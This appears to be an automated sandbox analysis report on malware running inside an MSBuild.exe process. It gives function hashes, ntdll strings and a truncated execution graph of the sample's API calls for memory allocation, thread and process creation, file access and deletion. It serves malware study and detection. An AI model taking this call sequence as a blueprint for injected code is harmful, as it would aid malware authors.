                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                              • Instruction ID: 874860f5f96d0f8643ccbeba875f579e55c6dc6d81152b93572ef6181cbe26af
                                                                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                              • Instruction Fuzzy Hash: F2C01232150644AFC7119A99CD01F0177A9E798B40F400021F20447570C531E810D644
                                                                                                              Function 013B0310 Relevance: .0, Instructions: 11COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                              • Instruction ID: 3661ef797145eee11033f8ef4e53819bbe61f97e0f004c01c4a53f0b535d30a6
                                                                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                              • Instruction Fuzzy Hash: BED01236100248EFCB05DF55C890D9B773AFBD8710F148019FD19076108A31ED62DA50
                                                                                                              Function 01390750 Relevance: .0, Instructions: 9COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                              • Instruction ID: 4eaed8b70906288748418428d9ec28996da203019708e6b8f3a2823feb50b4b2
                                                                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                              • Instruction Fuzzy Hash: 5CC04879701A42CFCF1ADB6ED298F49B7E4FB48748F1518A0E805CBB22E624E811CA10
                                                                                                              Function 013D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: f6b3e6ccb82119f6e8ef31b86090be9ab55c5a5d26df87e201fb2a27e1ee18f7
                                                                                                              • Instruction ID: d1649848d5ed42342daa63b758d9c374d3546e6b22c2a509f8610a8d3c5a2933
                                                                                                              • Opcode Fuzzy Hash: f6b3e6ccb82119f6e8ef31b86090be9ab55c5a5d26df87e201fb2a27e1ee18f7
                                                                                                              • Instruction Fuzzy Hash: EF5107B7A04216BFCB21DFADD88097FFBB8BB08248714812AF465D3681D374DE1087A0
                                                                                                              Function 01442410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: d67b2e61862a23c17a78bafa63fd58781914808783082ddf0ca4b1f58db5dfe2
                                                                                                              • Instruction ID: b7cf12febe6ff65a6f2d20b1958aa7d451cfed2d7c03f4389dac6bc7c37ef1fd
                                                                                                              • Opcode Fuzzy Hash: d67b2e61862a23c17a78bafa63fd58781914808783082ddf0ca4b1f58db5dfe2
                                                                                                              • Instruction Fuzzy Hash: 3F51F475A00745ABEB20DF9CD990D7FBBF8EF44205B04846AF496D3791E6F4DA0087A0
                                                                                                              Function 013C7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • Execute=1, xrefs: 01404713
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01404742
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01404725
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01404655
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014046FC
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01404787
                                                                                                              • ExecuteOptions, xrefs: 014046A0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                              • API String ID: 0-484625025
                                                                                                              • Opcode ID: 49dfe1676f629bc3e77d117c398e610cf512edf7a2480e3dd8a36b1bc6dbd196
                                                                                                              • Instruction ID: d44f2c0282efc40946873b8342ed8d658a10ff0b88407a5d4ba7da705803fbb6
                                                                                                              • Opcode Fuzzy Hash: 49dfe1676f629bc3e77d117c398e610cf512edf7a2480e3dd8a36b1bc6dbd196
                                                                                                              • Instruction Fuzzy Hash: 6C510B3260021D7AEF21ABA9EC85FFE77A8EF14718F0400ADDA05A72D1D7719E558F50
                                                                                                              Function 01466940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                              • Instruction ID: df340581edf7879c874eb502aa2399b839c31bb2b18f92e7fa5f07e5e31201a7
                                                                                                              • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                              • Instruction Fuzzy Hash: 2B022871508342AFD305CF19C890A6FBBE9EFD4718F058A2EF9958B264DB31E945CB42
                                                                                                              Function 013DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-$0$0
                                                                                                              • API String ID: 1302938615-699404926
                                                                                                              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                              • Instruction ID: 167425d8c3b4911529f715f06154e3335b24623e9ebf3830a08e04a83f0f4889
                                                                                                              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                              • Instruction Fuzzy Hash: 3B81E472E052498FEF25CE6CE4517FEFFB1AF46368F1A4119D861A7299C7348840C761
                                                                                                              Function 014420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                              • API String ID: 48624451-2819853543
                                                                                                              • Opcode ID: 30360e877ec58fd51a20a35751b083625c48446e03342f225a2814aa13bfded1
                                                                                                              • Instruction ID: def5a8bfb40bc64de98ac8782b7539bfa21c724e355e5952f735afd9b54b659d
                                                                                                              • Opcode Fuzzy Hash: 30360e877ec58fd51a20a35751b083625c48446e03342f225a2814aa13bfded1
                                                                                                              • Instruction Fuzzy Hash: 3F21537AA00219ABEB10DF6DD844EEFBBE8EF54644F040116F905E3354E770DA01CBA1
                                                                                                              Function 013BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RTL: Re-Waiting, xrefs: 0140031E
                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014002BD
                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014002E7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                              • API String ID: 0-2474120054
                                                                                                              • Opcode ID: 480613b8fdf02c3c8052039ab938e07a68851b428716f68f7ae3f8c7485ad9f7
                                                                                                              • Instruction ID: e1138fc2d4940d762166fe8163dd07511c9c4dfc7f2ab818b8836047d49bc8fa
                                                                                                              • Opcode Fuzzy Hash: 480613b8fdf02c3c8052039ab938e07a68851b428716f68f7ae3f8c7485ad9f7
                                                                                                              • Instruction Fuzzy Hash: 7DE1C1306047419FD726CF2CC884B6ABBE4BB44358F140A6EF6A5CBAE1E774D945CB42
                                                                                                              Function 013CBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RTL: Re-Waiting, xrefs: 01407BAC
                                                                                                              • RTL: Resource at %p, xrefs: 01407B8E
                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01407B7F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 0-871070163
                                                                                                              • Opcode ID: 78963b6b14ccfd3432305198ea7075ab0db8dc524817ee6387f9c92b3e2b8f4e
                                                                                                              • Instruction ID: b48f242d23f24f5b0b03907f8a741e0b5b1418fd1bcb26578e70961a589aab1b
                                                                                                              • Opcode Fuzzy Hash: 78963b6b14ccfd3432305198ea7075ab0db8dc524817ee6387f9c92b3e2b8f4e
                                                                                                              • Instruction Fuzzy Hash: 404106317007079FD721DE29D841B67B7E5EF94B19F000A2EF99A97790DB32E8098B91
                                                                                                              Function 013CB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0140728C
                                                                                                              Strings
                                                                                                              • RTL: Re-Waiting, xrefs: 014072C1
                                                                                                              • RTL: Resource at %p, xrefs: 014072A3
                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01407294
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-605551621
                                                                                                              • Opcode ID: 3d44916fbee3ab59b345849edf56615314177167ad34d66cf9a56e7ce829319e
                                                                                                              • Instruction ID: 05aadbbf20d754fe2c80f04eabe49e17e7db561783c5eb0431b75938ec7bc78f
                                                                                                              • Opcode Fuzzy Hash: 3d44916fbee3ab59b345849edf56615314177167ad34d66cf9a56e7ce829319e
                                                                                                              • Instruction Fuzzy Hash: 11412231600206ABC721DF2ACC42B66F7A5FF54B19F10062EF995AB790DB31F80687D2
                                                                                                              Function 01442300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              • Opcode ID: 3549e89f8e80b7b7c0552de2c4fa67524a199fd43fd946940e7346b21f3b19ae
                                                                                                              • Instruction ID: 721e9cf01cad853f5d1f7e3b0cc77d3ec19d8cf0ac229ac0995dcd0dd8d212e6
                                                                                                              • Opcode Fuzzy Hash: 3549e89f8e80b7b7c0552de2c4fa67524a199fd43fd946940e7346b21f3b19ae
                                                                                                              • Instruction Fuzzy Hash: 23316472A002299FEB60DF3DDC40FAF77B8EB54614F44055AE949E3250EB709A448B60
                                                                                                              Function 013D7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-
                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                              • Instruction ID: 78943ed4e37d51fe21d9b158687ca409cad2805a34fd85ec1b522a8bebecc8cc
                                                                                                              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                              • Instruction Fuzzy Hash: 5291D073E0021A9BEB34CF6DE881ABEBBA9FF4432CF14455AE955E72C0D73099458B50
                                                                                                              Function 01399126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 0-1194432280
                                                                                                              • Opcode ID: 3105b175890b0b53c4ce289d5f726ac6d05a6e9f2921c312e4eed687e75193ba
                                                                                                              • Instruction ID: 458a66dbf6e94a4f1dc53d643a3926bfc137ead4dd79034cbda932571f3d3e7e
                                                                                                              • Opcode Fuzzy Hash: 3105b175890b0b53c4ce289d5f726ac6d05a6e9f2921c312e4eed687e75193ba
                                                                                                              • Instruction Fuzzy Hash: 0B810C72D00269DBDB35CB54CC44BEEB7B8AB48758F0041EAEA19B7650D7709E84CFA0

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:2.4%
                                                                                                              Dynamic/Decrypted Code Coverage:3.3%
                                                                                                              Signature Coverage:1.8%
                                                                                                              Total number of Nodes:393
                                                                                                              Total number of Limit Nodes:64
                                                                                                              execution_graph 98837 2b09cb0 98838 2b09cbf 98837->98838 98839 2b09d00 98838->98839 98840 2b09ced CreateThread 98838->98840 98841 2b0b8f0 98844 2b2b920 98841->98844 98843 2b0cf61 98847 2b29a70 98844->98847 98846 2b2b951 98846->98843 98848 2b29b11 98847->98848 98850 2b29aa4 98847->98850 98849 2b29b24 NtAllocateVirtualMemory 98848->98849 98849->98846 98850->98846 98851 2b2cab0 98854 2b2b9b0 98851->98854 98857 2b29c80 98854->98857 98856 2b2b9c9 98858 2b29c9a 98857->98858 98859 2b29ca8 RtlFreeHeap 98858->98859 98859->98856 98860 2b295f0 98861 2b296b0 98860->98861 98863 2b29625 98860->98863 98862 2b296c3 NtCreateFile 98861->98862 98869 2b21f30 98874 2b21f49 98869->98874 98870 2b21fd9 98871 2b21f91 98872 2b2b9b0 RtlFreeHeap 98871->98872 98873 2b21fa1 98872->98873 98874->98870 98874->98871 98875 2b21fd4 98874->98875 98876 2b2b9b0 RtlFreeHeap 98875->98876 98876->98870 98877 2b28f30 98878 2b28f4a 98877->98878 98881 4a52df0 LdrInitializeThunk 98878->98881 98879 2b28f6f 98881->98879 98884 2b111fb PostThreadMessageW 98885 2b1120d 98884->98885 98886 2b171a0 98887 2b171ca 98886->98887 98890 2b18310 98887->98890 98889 2b171f4 98891 2b1832d 98890->98891 98897 2b29060 98891->98897 98893 2b1837d 98894 2b18384 98893->98894 98902 2b29140 98893->98902 98894->98889 98896 2b183ad 98896->98889 98898 2b29104 98897->98898 98900 2b29091 98897->98900 98907 4a52f30 LdrInitializeThunk 98898->98907 98899 2b2913a 98899->98893 98900->98893 98903 2b291fd 98902->98903 98905 2b29178 98902->98905 98908 4a52d10 LdrInitializeThunk 98903->98908 98904 2b2923f 98904->98896 98905->98896 98907->98899 98908->98904 98909 2b17720 98910 2b17738 98909->98910 98912 2b17792 98909->98912 98910->98912 98913 2b1b660 98910->98913 98914 2b1b686 98913->98914 98919 2b1b8b3 98914->98919 98934 2b29d00 98914->98934 98916 2b1b6fc 98916->98919 98937 2b2cb80 98916->98937 98918 2b1b71b 98918->98919 98920 2b1b7ef 98918->98920 98943 2b28f80 98918->98943 98919->98912 98923 2b15f40 LdrInitializeThunk 98920->98923 98933 2b1b80b 98920->98933 98923->98933 98924 2b1b7d7 98953 2b184e0 98924->98953 98926 2b1b786 98926->98919 98926->98924 98927 2b1b7b5 98926->98927 98947 2b15f40 98926->98947 98950 2b24bd0 98927->98950 98929 2b184e0 LdrInitializeThunk 98932 2b1b8a9 98929->98932 98932->98912 98933->98929 98935 2b29d1d 98934->98935 98936 2b29d2e CreateProcessInternalW 98935->98936 98936->98916 98938 2b2caf0 98937->98938 98939 2b2cb4d 98938->98939 98957 2b2ba90 98938->98957 98939->98918 98941 2b2cb2a 98942 2b2b9b0 RtlFreeHeap 98941->98942 98942->98939 98944 2b28f9a 98943->98944 98963 4a52c0a 98944->98963 98945 2b1b77d 98945->98920 98945->98926 98948 2b29140 LdrInitializeThunk 98947->98948 98949 2b15f7e 98948->98949 98949->98927 98951 2b184e0 LdrInitializeThunk 98950->98951 98952 2b24c02 98951->98952 98952->98924 98954 2b184f3 98953->98954 98966 2b28e80 98954->98966 98956 2b1851e 98956->98912 98960 2b29c30 98957->98960 98959 2b2baab 98959->98941 98961 2b29c4d 98960->98961 98962 2b29c5b RtlAllocateHeap 98961->98962 98962->98959 98964 4a52c11 98963->98964 98965 4a52c1f LdrInitializeThunk 98963->98965 98964->98945 98965->98945 98967 2b28eb1 98966->98967 98968 2b28f07 98966->98968 98967->98956 98971 4a52dd0 LdrInitializeThunk 98968->98971 98969 2b28f29 98969->98956 98971->98969 98972 2b29860 98973 2b2988e 98972->98973 98974 2b298e3 98972->98974 98975 2b298f6 NtDeleteFile 98974->98975 98976 2b21ba0 98977 2b21bbc 98976->98977 98978 2b21be4 98977->98978 98979 2b21bf8 98977->98979 98981 2b29910 NtClose 98978->98981 98986 2b29910 98979->98986 98983 2b21bed 98981->98983 98982 2b21c01 98989 2b2bad0 RtlAllocateHeap 98982->98989 98985 2b21c0c 98987 2b2992a 98986->98987 98988 2b29938 NtClose 98987->98988 98988->98982 98989->98985 98990 2b29760 98991 2b29813 98990->98991 98993 2b29794 98990->98993 98992 2b29826 NtReadFile 98991->98992 98995 2b12b67 98996 2b12b88 98995->98996 98999 2b166d0 98996->98999 98998 2b12b93 99000 2b16703 98999->99000 99001 2b16727 99000->99001 99006 2b29470 99000->99006 99001->98998 99003 2b1674a 99003->99001 99004 2b29910 NtClose 99003->99004 99005 2b167ca 99004->99005 99005->98998 99007 2b2948a 99006->99007 99010 4a52ca0 LdrInitializeThunk 99007->99010 99008 2b294b3 99008->99003 99010->99008 99011 2b09d10 99012 2b0a066 99011->99012 99014 2b0a434 99012->99014 99015 2b2b610 99012->99015 99016 2b2b636 99015->99016 99021 2b03ec0 99016->99021 99018 2b2b642 99019 2b2b67b 99018->99019 99024 2b25a50 99018->99024 99019->99014 99023 2b03ecd 99021->99023 99028 2b13610 99021->99028 99023->99018 99025 2b25ab2 99024->99025 99027 2b25abf 99025->99027 99039 2b11dc0 99025->99039 99027->99019 99030 2b1362d 99028->99030 99029 2b13643 99029->99023 99030->99029 99032 2b2a360 99030->99032 99034 2b2a37a 99032->99034 99033 2b2a3a9 99033->99029 99034->99033 99035 2b28f80 LdrInitializeThunk 99034->99035 99036 2b2a403 99035->99036 99037 2b2b9b0 RtlFreeHeap 99036->99037 99038 2b2a41c 99037->99038 99038->99029 99040 2b11df8 99039->99040 99055 2b18270 99040->99055 99042 2b11e00 99043 2b2ba90 RtlAllocateHeap 99042->99043 99053 2b120d6 99042->99053 99044 2b11e16 99043->99044 99045 2b2ba90 RtlAllocateHeap 99044->99045 99046 2b11e27 99045->99046 99047 2b2ba90 RtlAllocateHeap 99046->99047 99049 2b11e38 99047->99049 99054 2b11ecf 99049->99054 99075 2b16e30 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99049->99075 99051 2b12082 99071 2b283a0 99051->99071 99053->99027 99066 2b14960 99054->99066 99056 2b1829c 99055->99056 99076 2b18160 99056->99076 99059 2b182e1 99062 2b182fd 99059->99062 99064 2b29910 NtClose 99059->99064 99060 2b182c9 99061 2b182d4 99060->99061 99063 2b29910 NtClose 99060->99063 99061->99042 99062->99042 99063->99061 99065 2b182f3 99064->99065 99065->99042 99068 2b14984 99066->99068 99067 2b1498b 99067->99051 99068->99067 99069 2b149c0 LdrLoadDll 99068->99069 99070 2b149d7 99068->99070 99069->99070 99070->99051 99072 2b28402 99071->99072 99073 2b2840f 99072->99073 99087 2b120f0 99072->99087 99073->99053 99075->99054 99077 2b18256 99076->99077 99078 2b1817a 99076->99078 99077->99059 99077->99060 99082 2b29010 99078->99082 99081 2b29910 NtClose 99081->99077 99083 2b2902d 99082->99083 99086 4a535c0 LdrInitializeThunk 99083->99086 99084 2b1824a 99084->99081 99086->99084 99103 2b18540 99087->99103 99089 2b12673 99089->99073 99090 2b12110 99090->99089 99107 2b21570 99090->99107 99093 2b12324 99095 2b2cb80 2 API calls 99093->99095 99094 2b1216e 99094->99089 99110 2b2ca50 99094->99110 99097 2b12339 99095->99097 99096 2b184e0 LdrInitializeThunk 99099 2b12389 99096->99099 99097->99099 99115 2b10c20 99097->99115 99099->99089 99099->99096 99100 2b10c20 LdrInitializeThunk 99099->99100 99100->99099 99101 2b124e0 99101->99099 99102 2b184e0 LdrInitializeThunk 99101->99102 99102->99101 99104 2b1854d 99103->99104 99105 2b18575 99104->99105 99106 2b1856e SetErrorMode 99104->99106 99105->99090 99106->99105 99108 2b2b920 NtAllocateVirtualMemory 99107->99108 99109 2b21591 99108->99109 99109->99094 99111 2b2ca60 99110->99111 99112 2b2ca66 99110->99112 99111->99093 99113 2b2ba90 RtlAllocateHeap 99112->99113 99114 2b2ca8c 99113->99114 99114->99093 99118 2b29ba0 99115->99118 99119 2b29bbd 99118->99119 99122 4a52c70 LdrInitializeThunk 99119->99122 99120 2b10c42 99120->99101 99122->99120 99123 2b1c9d0 99125 2b1c9f9 99123->99125 99124 2b1cafd 99125->99124 99126 2b1caa3 FindFirstFileW 99125->99126 99126->99124 99128 2b1cabe 99126->99128 99127 2b1cae4 FindNextFileW 99127->99128 99129 2b1caf6 FindClose 99127->99129 99128->99127 99129->99124 99130 2b18bd0 99131 2b18bd5 99130->99131 99133 2b18bc1 99130->99133 99131->99133 99134 2b174c0 99131->99134 99135 2b174d6 99134->99135 99137 2b1750f 99134->99137 99135->99137 99138 2b17330 LdrLoadDll 99135->99138 99137->99133 99138->99137 99139 2b25e90 99140 2b25ef5 99139->99140 99141 2b25f30 99140->99141 99144 2b21840 99140->99144 99143 2b25f12 99145 2b217ef 99144->99145 99146 2b29910 NtClose 99145->99146 99147 2b2182f 99146->99147 99147->99143 99148 2b1a01c 99149 2b1a021 99148->99149 99150 2b1a04d 99149->99150 99151 2b2b9b0 RtlFreeHeap 99149->99151 99151->99150 99152 2b1fc40 99153 2b1fca4 99152->99153 99154 2b166d0 2 API calls 99153->99154 99156 2b1fdd7 99154->99156 99155 2b1fdde 99156->99155 99181 2b167e0 99156->99181 99158 2b1ff83 99159 2b1ff92 99161 2b29910 NtClose 99159->99161 99160 2b1fe5a 99160->99158 99160->99159 99185 2b1fa20 99160->99185 99164 2b1ff9c 99161->99164 99163 2b1fe96 99163->99159 99165 2b1fea1 99163->99165 99166 2b2ba90 RtlAllocateHeap 99165->99166 99167 2b1feca 99166->99167 99168 2b1fed3 99167->99168 99169 2b1fee9 99167->99169 99170 2b29910 NtClose 99168->99170 99194 2b1f910 CoInitialize 99169->99194 99172 2b1fedd 99170->99172 99173 2b1fef7 99197 2b293d0 99173->99197 99175 2b1ff72 99176 2b29910 NtClose 99175->99176 99177 2b1ff7c 99176->99177 99178 2b2b9b0 RtlFreeHeap 99177->99178 99178->99158 99179 2b1ff15 99179->99175 99180 2b293d0 LdrInitializeThunk 99179->99180 99180->99179 99182 2b16805 99181->99182 99201 2b29290 99182->99201 99186 2b1fa3c 99185->99186 99187 2b14960 LdrLoadDll 99186->99187 99189 2b1fa5a 99187->99189 99188 2b1fa63 99188->99163 99189->99188 99190 2b14960 LdrLoadDll 99189->99190 99191 2b1fb2e 99190->99191 99192 2b14960 LdrLoadDll 99191->99192 99193 2b1fb8b 99191->99193 99192->99193 99193->99163 99196 2b1f975 99194->99196 99195 2b1fa0b CoUninitialize 99195->99173 99196->99195 99198 2b293ea 99197->99198 99206 4a52ba0 LdrInitializeThunk 99198->99206 99199 2b29417 99199->99179 99202 2b292aa 99201->99202 99205 4a52c60 LdrInitializeThunk 99202->99205 99203 2b16879 99203->99160 99205->99203 99206->99199 99207 2b17540 99208 2b1755c 99207->99208 99212 2b175af 99207->99212 99209 2b29910 NtClose 99208->99209 99208->99212 99211 2b17577 99209->99211 99210 2b176e1 99217 2b16960 NtClose LdrInitializeThunk LdrInitializeThunk 99211->99217 99212->99210 99218 2b16960 NtClose LdrInitializeThunk LdrInitializeThunk 99212->99218 99215 2b176be 99215->99210 99219 